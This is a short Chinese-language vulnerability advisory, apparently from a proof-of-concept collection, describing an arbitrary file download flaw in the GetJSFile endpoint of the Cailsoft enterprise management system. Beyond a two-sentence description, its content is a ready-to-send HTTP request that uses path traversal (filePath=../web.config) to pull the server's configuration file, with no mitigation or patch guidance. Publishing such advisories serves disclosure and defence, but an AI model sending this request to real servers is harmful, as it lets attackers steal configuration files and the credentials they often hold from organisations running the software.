cailsoft企业管理系统 GetJSFile 存在任意文件下载漏洞

日期: 2024-07-19 | 影响软件: cailsoft企业管理系统 | POC: 已公开

漏洞描述

Cailsoft企业管理系统是一套集成了多种功能的软件系统，旨在帮助企业提高管理效率和运营效益。cailsoft企业管理系统 GetJSFile存在任意文件下载漏洞，攻击者可以通过该漏洞获取大量敏感信息。

PoC代码

GET /Utility/GetJSFile?filePath=../web.config HTTP/1.1
Host: 
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_1_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.5 Safari/605.1.15

相关漏洞推荐